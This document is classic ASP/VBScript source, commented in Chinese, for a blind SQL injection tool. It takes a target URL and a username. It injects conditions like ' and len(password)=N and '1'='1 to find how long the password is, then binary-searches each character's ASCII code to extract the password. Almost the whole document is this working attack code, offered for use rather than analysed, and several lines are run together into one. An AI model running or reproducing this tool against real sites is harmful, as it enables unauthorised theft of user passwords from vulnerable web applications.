程序代码
<%
response.buffer=false
'为防止程序陷入死循环,初始化一些最大重试值
Dim MaxPassLen,MaxPassAsc
MaxPassLen=20 '密码最大长度
MaxPassAsc=20
'==== 字符转换
Function bytes2BSTR(vIn)
strReturn = ""
For j = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,j,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,j+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
j = j + 1
End If
Next
bytes2BSTR = strReturn
End Function
' 下面是取网页内容 ==========
Function GetUrl(Url)
set oSend=createobject("Microsoft.XMLHTTP")
SourceCode = oSend.open ("GET",url,false)
oSend.send()
SourceCode = bytes2BSTR(oSend.responseBody)
GetUrl = SourceCode
End Function
'下面是判断返回页面效果
Function ChkPage(SourceCode,SucKey,ErrKey)
if Instr(SourceCode,SucKey) > 0 then ChkPage=true '页面返回成功 exit function
end if
if Instr(SourceCode,ErrKey) > 0 then ChkPage=false '页面出错 exit function
end if ChkPage=false '关键字信息不对或者是页面未连接 response.write("关键字信息不对或者是页面未连接") response.end
End Function
'开始破解
'Dim url,username,password,SucKey,
Dim PassLenUrl
Dim PassLen
Dim ChkPassLen
If request("begin")<>"" then response.cookies("PassLen")=0 url=request("url") username=request("username") password=request("password") SucKey=request("SucKey") ErrKey=request("ErrKey")
response.write("第一步,破解密码长度<BR>")
PassLen = 1
ChkPassLen = false
Do while not ChkPassLen PassLenUrl = Url & username & "'%20and%20len(" & password & ")=" & PassLen & "%20and%20'1'='1" response.write("当前测试密码位数为“" & PassLen & "”,请稍等......<BR>") ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) If ChkPassLen Then response.write("成功!!!密码位数已经测试出来了,开始测试具体位数<BR>") exit do Else response.write("不行,继续下一位测试!<BR>") End If If PassLen > MaxPassLen then response.write( "密码位数未能测试出,请确认是否有此用户或重新调整密码长度范围") response.end exit do End If PassLen = PassLen + 1
Loop
response.write ("<FONT COLOR=red>已经测试出密码长度为" & PassLen & ",开始测试具体密码值</FONT><BR><BR>")
'循环每一位
Dim Asc1,Asc2,Asc10,Asc20,Ascstr
'Dim AscArr(PassLen)
Dim ChkPass,Asctemp1,Asctemp,count
Ascstr = ""
For i=1 to PassLen
ChkPass = false
Asc1 = 33
Asc2 = 126
response.write "开始破解第" & i & "位密码<BR>"
'用二分法取asc码范围 count=1 suc=false Do while not suc Asctemp1=Asctemp if (Asc2-Asc1) mod 2 = 1 then Asctemp=(Asc2-Asc1-1)/2 else Asctemp=(Asc2-Asc1)/2 end if
response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" PassLenUrl = Url & username & "'%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20'1'='1" response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) if Asc1 = 33 and Asc2 = 126 and not ChkPass then response.write "密码不在所设定ASC码范围内" response.end exit do end if if ChkPass then Asc10=Asc1 Asc20=Asc2 response.write("密码在该范围内<BR>") if Asc1=Asc2 then Suc = true Asc2 = Asc1 + Asctemp else Asc1 = Asc20-Asctemp1 Asc2 = Asc20 response.write("不在该范围内,改试另一范围<BR>") end if count=count+1 if count>MaxPassAsc then response.write("死循环了!") response.end exit do end if Loop
Ascstr=Ascstr & chr(Asc1) response.write"<BR>当前破解进度(“"&Ascstr&"”)<BR><BR><BR><BR>"
Next